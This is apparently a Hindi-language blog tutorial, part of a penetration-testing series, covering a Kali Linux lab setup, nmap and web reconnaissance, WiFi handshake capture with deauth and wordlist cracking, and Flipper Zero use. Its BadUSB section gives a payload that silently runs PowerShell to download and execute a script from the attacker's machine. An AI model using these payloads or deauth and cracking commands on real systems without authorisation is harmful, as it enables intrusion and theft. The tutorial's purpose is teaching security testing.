मेनू
होम लेख {{t.nav.bookmarks}} {{t.nav.experience}} {{t.nav.profiles}} परिचय मेरे साथ काम करें
Linux terminal with code
सुरक्षा 7 मार्च, 2026 • 25 मिनट पढ़ें

Kali Linux की बुनियादी बातें: अपनी हैकिंग लैब बनाएं

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

साझा करें:
Lee Foropoulos

Lee Foropoulos

25 मिनट पढ़ें

Continue where you left off?
Text size:

Contents

हैकर का मार्ग: 5 भागों की श्रृंखला

भाग 1: परिचयभाग 2: Flipper में महारतभाग 3: Kali की बुनियादी बातेंभाग 4: एक्सप्लॉइटेशनभाग 5: पूर्ण ऑडिट

भाग 1 और 2 में, आपने कार्ड क्लोन किए, रेडियो फ्रीक्वेंसी का विश्लेषण किया और समझा कि ज़्यादातर "सुरक्षा" सिर्फ दिखावा है। आपने कमज़ोरियों को बाहर से देखा। अब आप अंदर जाकर उन्हें हमलावर की नज़र से देखेंगे।

Kali Linux इंडस्ट्री-स्टैंडर्ड पेनिट्रेशन टेस्टिंग डिस्ट्रीब्यूशन है। यह 600 से ज़्यादा सुरक्षा टूल्स के साथ प्री-लोडेड आता है। यह भारी लग सकता है। ज़्यादातर ट्यूटोरियल आपको गहरे पानी में फेंक देते हैं, ऐसी कमांड्स के साथ जो आप नहीं समझते और बिना किसी संदर्भ के कि वे क्यों मायने रखती हैं।

हम इसे अलग तरीके से कर रहे हैं। इस लेख के अंत तक, आपके पास एक काम करने वाली लैब होगी, आप नेटवर्क रिकॉनसेंस को बुनियादी स्तर पर समझेंगे, और अपना पहला WiFi handshake कैप्चर करेंगे। हर कदम पिछले पर बनता है।

ज़्यादातर ट्यूटोरियल आपको गहरे पानी में फेंक देते हैं, ऐसी कमांड्स के साथ जो आप नहीं समझते और बिना किसी संदर्भ के कि वे क्यों मायने रखती हैं। यहाँ हर कदम पिछले पर बनता है।

भाग 1: अपनी लैब बनाना

प्रोफेशनल पेनिट्रेशन टेस्टर अपनी मुख्य मशीन पर Kali नहीं चलाते। वे आइसोलेटेड एन्वायरनमेंट का इस्तेमाल करते हैं जिन्हें रीसेट, स्नैपशॉट और नष्ट किया जा सकता है, बिना मुख्य सिस्टम को प्रभावित किए। आप भी ऐसा ही करेंगे।

विकल्प A: वर्चुअल मशीन (सीखने के लिए सुझाई गई)

वर्चुअल मशीन आपको सबसे सुरक्षित सीखने का वातावरण देती है। आप अपनी प्रगति के स्नैपशॉट ले सकते हैं, गलतियाँ कर सकते हैं, और तुरंत वापस जा सकते हैं।

आपको क्या चाहिए

  • होस्ट मशीन: 16GB+ RAM, 50GB+ फ्री डिस्क स्पेस, virtualization सपोर्ट वाला मॉडर्न CPU
  • वर्चुअलाइज़ेशन सॉफ़्टवेयर: VirtualBox (मुफ़्त) या VMware Workstation Player (व्यक्तिगत उपयोग के लिए मुफ़्त)
  • Kali Linux: kali.org से आधिकारिक प्री-बिल्ट VM

प्रोजेक्ट: Kali VM सेटअप

समय: 30-45 मिनट

स्टेप्स:

  1. अपने hypervisor (VirtualBox या VMware) के लिए Kali VM इमेज डाउनलोड करें
  2. डाउनलोड किए गए आर्काइव को एक्सट्रैक्ट करें (Windows के लिए 7-Zip सुझाया गया)
  3. VM को अपने hypervisor में इम्पोर्ट करें
  4. रिसोर्सेज़ कॉन्फ़िगर करें: न्यूनतम 4GB RAM (8GB सुझाई), 2+ CPU कोर
  5. नेटवर्क एडाप्टर को "Bridged" मोड में इनेबल करें पूर्ण नेटवर्क एक्सेस के लिए
  6. VM बूट करें और डिफ़ॉल्ट क्रेडेंशियल्स से लॉगिन करें: kali / kali
  7. टर्मिनल खोलें और चलाएँ: sudo apt update && sudo apt full-upgrade -y
  8. आसान रिकवरी के लिए "Fresh Install" नाम से एक स्नैपशॉट बनाएँ

सफलता की पुष्टि: आप टर्मिनल खोल सकते हैं, whoami चला सकते हैं, और kali देख सकते हैं।

विकल्प B: डेडिकेटेड हार्डवेयर (गंभीर अभ्यास के लिए)

एक बार जब आप Kali में सहज हो जाएँ, तो डेडिकेटेड हार्डवेयर VM ओवरहेड हटा देता है और पूर्ण हार्डवेयर एक्सेस देता है, जो वायरलेस टेस्टिंग के लिए ज़रूरी है।

हार्डवेयर सिफ़ारिशें

बजट विकल्पयूज़्ड ThinkPad X230/T430 ($100-150), Intel WiFi को Atheros AR9285 से बदलें
मॉडर्न विकल्पLinux-compatible WiFi मॉड्यूल वाला Framework Laptop
डेडिकेटेड सेंसरएक्सटर्नल Alfa AWUS036ACH एडाप्टर वाला Raspberry Pi 5 4GB

अभी के लिए, VM बिल्कुल सही है। डेडिकेटेड हार्डवेयर तब ज़रूरी हो जाता है जब आपको वायरलेस टेस्टिंग के लिए monitor mode चाहिए (इस लेख में आगे कवर किया गया है)।

विकल्प C: Live USB (ज़ीरो परसिस्टेंस)

Live USB Kali को सीधे बिना इंस्टॉलेशन के चलाता है। पावर ऑफ़ करने पर सब कुछ गायब हो जाता है। अलग हार्डवेयर पर टेस्टिंग के लिए उपयोगी, लेकिन हर सेशन में आपका काम खो जाएगा जब तक आप persistent पार्टीशन न बनाएँ।

bash
1# Create bootable USB on Linux/Mac
2sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
3# Replace sdX with your USB device (check with 'lsblk')
4# On Windows: Use Rufus or balenaEtcher

dd डेटा नष्ट करता है

dd कमांड बिना किसी पुष्टि के सीधे डिस्क पर लिखती है। डिवाइस नाम तीन बार जाँचें। गलत डिवाइस पर लिखने से वह ड्राइव पूरी तरह वाइप हो जाएगी।

Kali Linux terminal with security tools running
सही तरीके से कॉन्फ़िगर किया गया Kali Linux एन्वायरनमेंट हर प्रोफेशनल पेनिट्रेशन टेस्ट की नींव है।

भाग 2: टर्मिनल माइंडसेट

सुरक्षा टूल्स को छूने से पहले, आपको टर्मिनल में सहज होना ज़रूरी है। यह वैकल्पिक नहीं है। GUI Kali में मौजूद है, लेकिन असली काम कमांड लाइन पर होता है।

बुनियादी नेविगेशन

bash
1# Know where you are
2pwd                    # Print working directory
3
4# Move around
5cd /home/kali          # Go to home directory
6cd ..                  # Go up one level
7cd -                   # Go to previous directory
8
9# See what's here
10ls                     # List files
11ls -la                 # List all files with details
12ls -lah                # Human-readable sizes
13
14# Read files
15cat filename           # Display entire file
16less filename          # Scrollable view (q to quit)
17head -n 20 filename    # First 20 lines
18tail -f filename       # Follow file in real-time (logs)

प्रिविलेज एस्केलेशन

कई सुरक्षा टूल्स को root एक्सेस चाहिए। Kali में, sudo आपको अस्थायी root प्रिविलेज देता है।

bash
1sudo command           # Run single command as root
2sudo -i                # Start root shell (be careful)
3whoami                 # Check current user
4id                     # Show user and group IDs

ज़िम्मेदारी से Root करें

Root के रूप में चलाने का मतलब है कोई सेफ्टी नेट नहीं। rm -rf / जैसी टाइपो सब कुछ नष्ट कर देगी। मॉडर्न Kali इस खास कमांड को रोकता है, लेकिन सिद्धांत कायम है: जो चला रहे हैं उसे चलाने से पहले समझें।

प्रोसेस मैनेजमेंट

bash
1ps aux                 # All running processes
2top                    # Real-time process viewer
3htop                   # Better process viewer (install if needed)
4
5# Control processes
6ctrl+c                 # Stop current process
7ctrl+z                 # Suspend process
8bg                     # Resume in background
9fg                     # Bring to foreground
10
11# Kill processes
12kill PID               # Graceful termination
13kill -9 PID            # Force kill (last resort)

नेटवर्क कमांड्स

bash
1ip a                   # Show network interfaces
2ip route               # Show routing table
3ping -c 4 8.8.8.8     # Test connectivity
4curl ifconfig.me       # Your public IP
5
6# DNS lookups
7nslookup google.com
8dig google.com

प्रोजेक्ट: टर्मिनल ओरिएंटेशन

समय: 15 मिनट

कार्य:

  1. ip a का इस्तेमाल करके लोकल नेटवर्क पर अपना IP एड्रेस खोजें
  2. ip route का इस्तेमाल करके अपना डिफ़ॉल्ट गेटवे पहचानें
  3. कनेक्टिविटी कन्फ़र्म करने के लिए अपने गेटवे को पिंग करें
  4. /etc में सभी फ़ाइलें मॉडिफ़िकेशन टाइम के अनुसार सॉर्ट करें: ls -lt /etc | head
  5. /etc/passwd की पहली 50 लाइनें पढ़ें: head -n 50 /etc/passwd

लक्ष्य: आपको बिना सोचे नेविगेट करने, नेटवर्क स्टेटस चेक करने और फ़ाइलें पढ़ने में सक्षम होना चाहिए।

भाग 3: Nmap से नेटवर्क रिकॉनसेंस

Nmap (Network Mapper) सबसे महत्वपूर्ण टूल है जो आप सीखेंगे। यह hosts की खोज करता है, सर्विसेज़ की पहचान करता है, ऑपरेटिंग सिस्टम डिटेक्ट करता है और नेटवर्क टोपोलॉजी मैप करता है। बाकी सब कुछ nmap आउटपुट पर बनता है।

आपकी पहली स्कैन

चलिए अपने नेटवर्क को स्कैन करते हैं। पहले, अपनी नेटवर्क रेंज पहचानें:

bash
1# Find your local IP and subnet
2ip a | grep inet
3# Look for something like: inet 192.168.1.100/24
4# The /24 means your network is 192.168.1.0-255
bash
1# Basic discovery scan (your network only)
2sudo nmap -sn 192.168.1.0/24
3
4# What this does:
5# -sn = ping scan (no port scanning, just host discovery)
6# /24 = scan all 256 addresses in this subnet

आपको इस तरह का आउटपुट दिखेगा:

text
1Nmap scan report for 192.168.1.1
2Host is up (0.0025s latency).
3MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
4
5Nmap scan report for 192.168.1.50
6Host is up (0.0042s latency).
7MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

वह पहली स्कैन आपको बताती है: "मेरे नेटवर्क पर ये डिवाइस मौजूद हैं।" अब गहरे सवाल पूछते हैं।

सर्विस डिटेक्शन

एक बार जब आप जान लें कि कौन से hosts मौजूद हैं, तो आप जानना चाहेंगे कि वे कौन सी सर्विसेज़ चला रहे हैं।

bash
1# Scan a single target for open ports and services
2sudo nmap -sV 192.168.1.1
3# -sV = Version detection (probe open ports for service info)

सामान्य आउटपुट:

text
1PORT     STATE SERVICE  VERSION
222/tcp   open  ssh      OpenSSH 8.4p1
380/tcp   open  http     nginx 1.18.0
4443/tcp  open  ssl/http nginx 1.18.0

ऑपरेटिंग सिस्टम डिटेक्शन

bash
1# Detect OS (requires root)
2sudo nmap -O 192.168.1.1
3
4# Combined scan: OS detection + service versions + default scripts
5sudo nmap -A 192.168.1.1

पोर्ट स्टेट्स को समझना

Nmap पोर्ट्स को कई स्टेट्स में रिपोर्ट करता है:

  • open - एप्लिकेशन सक्रिय रूप से कनेक्शन स्वीकार कर रही है। यही है जो हमलावर खोजते हैं।
  • closed - पोर्ट एक्सेसिबल है लेकिन कोई एप्लिकेशन नहीं सुन रही। होस्ट चालू है लेकिन वहाँ कुछ नहीं है।
  • filtered - फ़ायरवॉल या फ़िल्टर प्रोब को ब्लॉक कर रहा है। ओपन या क्लोज़्ड पता नहीं चल सकता।
  • unfiltered - पोर्ट एक्सेसिबल है लेकिन nmap तय नहीं कर पा रहा कि ओपन है या क्लोज़्ड।

स्कैन टाइप्स और स्टेल्थ

bash
1# TCP Connect scan (default, noisy but reliable)
2sudo nmap -sT target
3
4# SYN scan (stealthier, default with root)
5sudo nmap -sS target
6
7# UDP scan (slow but important - many services use UDP)
8sudo nmap -sU target
9
10# Scan all 65535 ports (thorough but slow)
11sudo nmap -p- target
12
13# Scan specific ports
14sudo nmap -p 22,80,443,8080 target
15
16# Top 1000 common ports (default behavior)
17sudo nmap target

Nmap Scripting Engine (NSE)

NSE nmap को वल्नरेबिलिटी डिटेक्शन, सर्विस एन्यूमरेशन और बहुत कुछ के लिए स्पेशलाइज़्ड स्क्रिप्ट्स से विस्तारित करता है।

bash
1# Run default safe scripts
2sudo nmap -sC target
3
4# Check for vulnerabilities
5sudo nmap --script vuln target
6
7# SMB enumeration (Windows shares)
8sudo nmap --script smb-enum-shares target
9
10# HTTP enumeration
11sudo nmap --script http-enum target
12
13# List available scripts
14ls /usr/share/nmap/scripts/ | head -20

प्रोजेक्ट: अपने नेटवर्क को मैप करें

समय: 30 मिनट

पूर्वापेक्षाएँ: ip a से अपनी नेटवर्क रेंज जानें

  1. सभी hosts खोजें: sudo nmap -sn YOUR_NETWORK/24
  2. खोजे गए hosts और उनके MAC एड्रेस की सूची बनाएँ
  3. अपना राउटर चुनें (आमतौर पर .1) और चलाएँ: sudo nmap -sV -sC YOUR_ROUTER
  4. अपने राउटर पर सभी ओपन पोर्ट्स और सर्विसेज़ पहचानें
  5. sudo nmap -A YOUR_COMPUTER चलाएँ यह देखने के लिए कि आपकी मशीन क्या एक्सपोज़ करती है

डॉक्यूमेंट करें: एक टेक्स्ट फ़ाइल बनाएँ जिसमें हर डिवाइस, उसका IP, MAC और सर्विसेज़ लिस्ट हों। यह आपका नेटवर्क मैप है।

केवल अपने नेटवर्क स्कैन करें

बिना अनुमति के नेटवर्क स्कैन करना ज़्यादातर न्यायिक क्षेत्रों में अवैध है। एक साधारण nmap स्कैन भी अनधिकृत एक्सेस माना जा सकता है। अपने नेटवर्क, अपने उपकरणों और उन नेटवर्क पर बने रहें जहाँ आपके पास स्पष्ट लिखित अनुमति है।

भाग 4: वेब रिकॉनसेंस

आपकी nmap स्कैन में शायद HTTP सर्विसेज़ (पोर्ट्स 80, 443, 8080) मिली होंगी। चलिए समझते हैं कि वहाँ क्या चल रहा है।

Whatweb: त्वरित सर्विस पहचान

bash
# Identify web technologies
whatweb http://192.168.1.1

उदाहरण आउटपुट:

text
1http://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
2HTTPServer[nginx/1.18.0], IP[192.168.1.1],
3Title[Router Admin], nginx[1.18.0]

Nikto: वेब वल्नरेबिलिटी स्कैनर

bash
1# Scan for common web vulnerabilities
2nikto -h http://192.168.1.1
3
4# This checks for:
5# - Outdated server software
6# - Dangerous files/CGIs
7# - Misconfigurations
8# - Default credentials

डायरेक्टरी एन्यूमरेशन: क्या छिपा है?

वेब सर्वर में अक्सर ऐसी डायरेक्टरी होती हैं जो मुख्य पेज से लिंक नहीं होतीं: एडमिन पैनल, कॉन्फ़िग फ़ाइलें, बैकअप फ़ाइलें।

bash
# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

सामान्य ख़ोज:

text
1/admin   (Status: 301)
2/backup  (Status: 403)
3/config  (Status: 200)
4/login   (Status: 200)

Wordlists का स्थान

Kali /usr/share/wordlists/ में विस्तृत wordlists शामिल करता है। सबसे आम डायरेक्टरी: dirb/, dirbuster/, rockyou.txt (पासवर्ड), और seclists/ (व्यापक कलेक्शन)।

प्रोजेक्ट: अपने राउटर के वेब इंटरफ़ेस का ऑडिट करें

समय: 20 मिनट

  1. सर्वर पहचानने के लिए whatweb http://YOUR_ROUTER_IP चलाएँ
  2. वल्नरेबिलिटीज़ चेक करने के लिए nikto -h http://YOUR_ROUTER_IP चलाएँ
  3. gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt चलाएँ
  4. ब्राउज़र में खोजी गई डायरेक्टरी विज़िट करें
  5. एडमिन पैनल, वर्शन नंबर या दिलचस्प ख़ोज नोट करें

सामान्य ख़ोज: डिफ़ॉल्ट क्रेडेंशियल्स के साथ एक्सपोज़्ड राउटर एडमिन पेज।

Server room with network infrastructure
नेटवर्क रिकॉनसेंस टार्गेट एन्वायरनमेंट की पूरी टोपोलॉजी को उजागर करता है, राउटर से लेकर छिपी सर्विसेज़ तक।

भाग 5: वायरलेस रिकॉनसेंस

यहाँ चीज़ें दिलचस्प होती हैं। WiFi नेटवर्क लगातार ब्रॉडकास्ट करते हैं, और सही टूल्स के साथ, आप ऑथेंटिकेशन handshakes कैप्चर कर सकते हैं: वह एन्क्रिप्टेड एक्सचेंज जो डिवाइस कनेक्ट होने पर होता है।

हार्डवेयर रिक्वायरमेंट्स

आपका बिल्ट-इन WiFi शायद इसके लिए काम नहीं करेगा। आपको ऐसा एडाप्टर चाहिए जो monitor mode और packet injection सपोर्ट करे। सुझाव: Alfa AWUS036ACH ($50) या Alfa AWUS036ACM ($45)। ये Kali के साथ बॉक्स से बाहर काम करते हैं।

Monitor Mode को समझना

सामान्य WiFi मोड ("managed mode") केवल आपके डिवाइस के लिए आने वाले पैकेट प्राप्त करता है। Monitor mode रेंज में सभी पैकेट कैप्चर करता है, चैनल पर हर डिवाइस का ट्रैफ़िक।

bash
1# Check your wireless interfaces
2iwconfig
3# Look for your adapter (often wlan0 or wlan1)
4
5# Kill interfering processes
6sudo airmon-ng check kill
7
8# Enable monitor mode
9sudo airmon-ng start wlan0
10# Your interface is now wlan0mon

नेटवर्क स्कैनिंग

bash
1# Start capturing wireless traffic
2sudo airodump-ng wlan0mon
3
4# You'll see:
5# BSSID  = Router MAC address
6# PWR    = Signal strength (higher = closer)
7# CH     = Channel
8# ENC    = Encryption (WPA2, WPA3, OPN)
9# ESSID  = Network name
10
11# Press Ctrl+C to stop

जो आप देख रहे हैं वह रेंज में हर WiFi नेटवर्क है, उनकी सुरक्षा सेटिंग्स, और अक्सर उनसे जुड़े डिवाइस। यही है जो एक war driver देखता है जब वह मोहल्लों को स्कैन करता है।

Handshake कैप्चर करना

जब कोई डिवाइस WPA2 नेटवर्क से कनेक्ट होता है, तो एक four-way handshake होता है। अगर आप इस handshake को कैप्चर करें, तो आप ऑफ़लाइन पासवर्ड क्रैक करने की कोशिश कर सकते हैं।

bash
1# Focus on your target network (your own network!)
2sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
3# -c CHANNEL = Target's channel from previous scan
4# --bssid = Target router's MAC address
5# -w capture = Save to files starting with "capture"
6
7# Now wait for a device to connect...
8
9# Or force a reconnection (on YOUR network only):
10# In a new terminal:
11sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
12# This sends 5 deauth packets, disconnecting clients
13# They automatically reconnect, generating a handshake

जब आप handshake कैप्चर करते हैं, तो airodump-ng ऊपरी-दाएँ कोने में [ WPA handshake: XX:XX:XX:XX:XX:XX ] दिखाता है।

Deauth अटैक अवैध हैं

जो नेटवर्क आपके नहीं हैं उनमें deauthentication पैकेट भेजना Computer Fraud and Abuse Act (अमेरिका में) और अन्य जगहों पर समान कानूनों के तहत संघीय अपराध है। केवल अपने नेटवर्क पर टेस्ट करें। मकसद वल्नरेबिलिटी को समझना है, दूसरों पर हमला करना नहीं।

Handshake क्रैक करना

कैप्चर किए गए handshake के साथ, आप wordlist का इस्तेमाल करके ऑफ़लाइन पासवर्ड क्रैक करने की कोशिश कर सकते हैं:

bash
1# Crack using a wordlist
2aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
3
4# If the password is in the wordlist, you'll see:
5# KEY FOUND! [ password123 ]
6
7# For stronger passwords, use hashcat (GPU-accelerated)
8# First, convert capture format:
9cap2hccapx capture-01.cap capture.hccapx
10
11# Then crack with hashcat:
12hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
असली डेटा ब्रीच से असली पासवर्ड rockyou.txt में शामिल हैं, जो कैप्चर किए गए WiFi handshakes को क्रैक करने के लिए इस्तेमाल होने वाली डिफ़ॉल्ट wordlist है।

पासवर्ड स्ट्रेंथ रियलिटी चेक

rockyou.txt में असली डेटा ब्रीच से 14+ मिलियन पासवर्ड हैं। अगर आपका WiFi पासवर्ड "password123" या "summer2024" या आपके कुत्ते का नाम है, तो यह सेकंडों में क्रैक हो सकता है। 12+ कैरेक्टर का रैंडम पासवर्ड brute-force करने में लाखों साल लगेंगे।

प्रोजेक्ट: अपनी WiFi सुरक्षा टेस्ट करें

समय: 45 मिनट

पूर्वापेक्षाएँ: Monitor mode सपोर्ट वाला एक्सटर्नल WiFi एडाप्टर

  1. Monitor mode इनेबल करें: sudo airmon-ng start wlan0
  2. नेटवर्क स्कैन करें: sudo airodump-ng wlan0mon
  3. अपने नेटवर्क का चैनल और BSSID नोट करें
  4. अपने चैनल पर कैप्चर करें: sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
  5. अपने WiFi पर एक डिवाइस रीकनेक्ट करें (या अपने नेटवर्क पर deauth इस्तेमाल करें)
  6. Handshake कैप्चर कन्फ़र्म करें
  7. rockyou.txt से टेस्ट करें: aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

परिणाम: अगर आपका पासवर्ड मिल गया, तो इसे तुरंत कुछ रैंडम और लंबे (20+ कैरेक्टर) में बदलें।

भाग 6: अपना Flipper Zero कनेक्ट करना

भाग 2 के वे सारे कैप्चर याद हैं? चलिए उन्हें अपनी Kali वर्कफ़्लो में इंटीग्रेट करते हैं।

फ़ाइलें ट्रांसफ़र करना

bash
1# Connect Flipper via USB
2# It appears as a mass storage device
3
4# Mount if not auto-mounted
5sudo mount /dev/sda1 /mnt/flipper
6
7# Your captures are in:
8/mnt/flipper/subghz/       # Sub-GHz captures
9/mnt/flipper/nfc/          # NFC dumps
10/mnt/flipper/infrared/     # IR captures
11/mnt/flipper/lfrfid/       # 125kHz RFID
12/mnt/flipper/badusb/       # BadUSB scripts

NFC Dumps का विश्लेषण

bash
1# Install libnfc tools
2sudo apt install libnfc-bin mfoc mfcuk
3
4# Flipper saves NFC as .nfc text format
5# Convert to binary for analysis:
6python3 flipper_nfc_to_mfd.py card.nfc card.mfd
7
8# Analyze MIFARE Classic dump
9hexdump -C card.mfd | less

Sub-GHz विश्लेषण

bash
1# Flipper's .sub files are text-based
2cat garage_door.sub
3
4# Contains:
5# - Frequency (315MHz, 433MHz, etc.)
6# - Protocol or RAW data
7# - Timing information
8
9# For deeper RF analysis, use:
10# - Universal Radio Hacker (URH)
11# - GNU Radio
12# - rtl_433 (with SDR hardware)

BadUSB डेवलपमेंट

Kali में BadUSB payloads बनाएँ, Flipper पर टेस्ट करें:

bash
1# Flipper uses DuckyScript-compatible syntax
2# Create payload on Kali:
3cat > kali_connect.txt << 'EOF'
4DELAY 1000
5GUI r
6DELAY 500
7STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
8ENTER
9EOF
10
11# Host the payload from Kali:
12python3 -m http.server 8000
13
14# Copy to Flipper's badusb folder
15cp kali_connect.txt /mnt/flipper/badusb/

BadUSB Payloads शक्तिशाली हैं

ये स्क्रिप्ट प्लग इन करते ही ऑटोमैटिक रूप से एक्ज़ीक्यूट होती हैं। एक दुर्भावनापूर्ण payload सेकंडों में backdoors इंस्टॉल कर सकता है, credentials चुरा सकता है या डेटा नष्ट कर सकता है। केवल टेस्टिंग के लिए अपनी मशीनों पर इस्तेमाल करें। अपना Flipper कभी ऐसी जगह न छोड़ें जहाँ कोई और इसे प्लग कर सके।

भाग 7: डॉक्यूमेंटेशन और वर्कफ़्लो

प्रोफेशनल पेनिट्रेशन टेस्टर सिर्फ़ टूल्स नहीं चलाते। वे सब कुछ डॉक्यूमेंट करते हैं। अच्छा डॉक्यूमेंटेशन शौकिया लोगों को प्रोफेशनल्स से अलग करता है।

CherryTree से नोट्स लेना

bash
1# Install CherryTree (hierarchical note-taking)
2sudo apt install cherrytree
3
4# Organize notes by:
5# - Target/network
6# - Reconnaissance
7# - Enumeration
8# - Vulnerabilities
9# - Exploitation attempts
10# - Post-exploitation

Nmap आउटपुट सेव करना

bash
1# Save in all formats
2sudo nmap -sV -sC -oA scan_results target
3
4# Creates:
5# scan_results.nmap (human-readable)
6# scan_results.xml  (parseable)
7# scan_results.gnmap (greppable)

सेशन लॉगिंग

bash
1# Log entire terminal session
2script session_$(date +%Y%m%d_%H%M%S).log
3
4# Now every command and output is recorded
5# Type 'exit' to stop logging

हैकर का मार्ग

5 भागों की श्रृंखला जो आपको जिज्ञासु से सक्षम बनाती है।

भाग 1: परिचय भाग 2: Flipper में महारत भाग 3: Kali की बुनियादी बातें ✓ भाग 4: एक्सप्लॉइटेशन भाग 5: पूर्ण ऑडिट

भाग 3 चेकलिस्ट

☐ लैब सेटअप: Kali VM चल रहा, अपडेटेड, स्नैपशॉट सेव

☐ टर्मिनल: नेविगेशन, परमिशन, प्रोसेस कंट्रोल में सहज

☐ Nmap: नेटवर्क मैप किया, सर्विसेज़ पहचानी, राउटर स्कैन किया

☐ वेब रिकॉन: राउटर वेब इंटरफ़ेस whatweb/nikto से विश्लेषित

☐ वायरलेस: Monitor mode इनेबल, नेटवर्क स्कैन किए

☐ Handshake: अपना WiFi handshake कैप्चर और टेस्ट किया

☐ Flipper: फ़ाइलें ट्रांसफ़र, वर्कफ़्लो समझा

☐ डॉक्यूमेंटेशन: नोट्स व्यवस्थित, स्कैन सेव

Kali बुनियादी बातें एक्शन प्लान 0/6

आगे क्या है

आपने अपनी लैब बनाई और रिकॉनसेंस फ़ेज़ सीखा। आप hosts खोज सकते हैं, सर्विसेज़ पहचान सकते हैं और वायरलेस handshakes कैप्चर कर सकते हैं। आप समझते हैं कि हमलावर नेटवर्क को देखते समय क्या देखते हैं।

भाग 4 में, हम रिकॉनसेंस से एक्सप्लॉइटेशन की तरफ बढ़ते हैं। आप सीखेंगे:

  • Metasploit Framework, एक्सप्लॉइटेशन का स्विस आर्मी नाइफ
  • सामान्य वल्नरेबिलिटी एक्सप्लॉइटेशन वर्कफ़्लो
  • Post-exploitation तकनीकें: शुरुआती एक्सेस के बाद क्या होता है
  • प्रिविलेज एस्केलेशन: सामान्य यूज़र से एडमिनिस्ट्रेटर बनना
  • Pivoting: एक कॉम्प्रोमाइज़्ड सिस्टम का इस्तेमाल करके दूसरों पर हमला

रिकॉनसेंस आपको बताता है कि दरवाज़े कहाँ हैं। एक्सप्लॉइटेशन आपको सिखाता है कि उनसे कैसे गुज़रना है।

आपने इलाके का नक्शा बनाया। अब आप उसमें नेविगेट करना सीखते हैं। भाग 4 आपको दर्शक से ऑपरेटर बनाता है।

भाग 4 में मिलते हैं।

How was this article?

साझा करें

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Koi bhi post na chookeN

Naye lekh prakashit hone par suchna prapt kareN. Email ki zaroorat nahiN.

Nayi post hone par site par ek banner dikhega, aur browser notification bhi agar aap anumati dete hain.

Keval browser soochnaeN. Koi spam nahiN.

0 / 0